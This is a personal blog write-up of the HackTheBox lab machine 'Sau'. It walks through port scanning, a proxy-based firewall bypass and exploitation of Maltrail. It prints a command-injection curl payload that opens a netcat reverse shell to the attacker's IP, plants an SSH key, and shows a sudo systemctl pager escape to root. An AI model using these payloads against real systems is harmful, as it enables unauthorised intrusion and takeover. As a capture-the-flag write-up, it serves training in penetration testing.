cwoellner.com ~ personal website & blog

Writeup of Sau From HackTheBox

Published on: Sunday, Jan 7, 2024

Getting a foothold and user flag

I start by running a nmap scan in order to discover any open ports:

>>> nmap -sS -Pn -p- -T5 -oN nmap.txt 10.129.163.130
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
4095/tcp  filtered xtgui
7115/tcp  filtered unknown
8338/tcp  filtered unknown
14359/tcp filtered unknown
47306/tcp filtered unknown
49717/tcp filtered unknown
54433/tcp filtered unknown
55555/tcp open     unknown

Port 55555 is open, so I try to reach it with my browser.

Landing Page

The page allows you to create a “basket”. Once a basket is created, the user is able to send HTTP requests to it and retrieve custom responses. One feature that I find particularly interesting is found under the “Settings”-Button and allows you to use the page as a proxy. Since port 80 is filtered for remote IP addresses, I could use the proxy feature and try to access it from localhost.

Proxy Settings

When I open the page using the bucket URL, the firewall bypass works and reveals a website running an application called “Maltrail”.

Firewall Bypass

Looking up the application, I find a RCE with a PoC available. I try to replace the payload of the PoC with various reverse shells from https://www.revshells.com/ and get it to work with “busybox nc -e”.

curl http://10.129.163.130:55555/ansg0gn/login  --data 'username=;`busybox nc 10.10.14.46 4242 -e /bin/bash`'

This gives me a shell as the user of the machine, I can now read the user flag. I also create the “.ssh” directory in /home/puma and add my public ssh key to the authorized_keys file in order to be able to log in via ssh, since the reverse shell is quite laggy.

Root flag

After logging in via ssh, I run sudo -l.

>>> sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

I look up systemctl at GTFOBins and use method c to escalate to root. I enter sudo /usr/bin/systemctl status trail.service and once the journal pops up I type !bash

Upon hitting enter, I receive a shell as root.

Want to chat about anything you read on here? Feel free to e-mail me at christian@cwoellner.com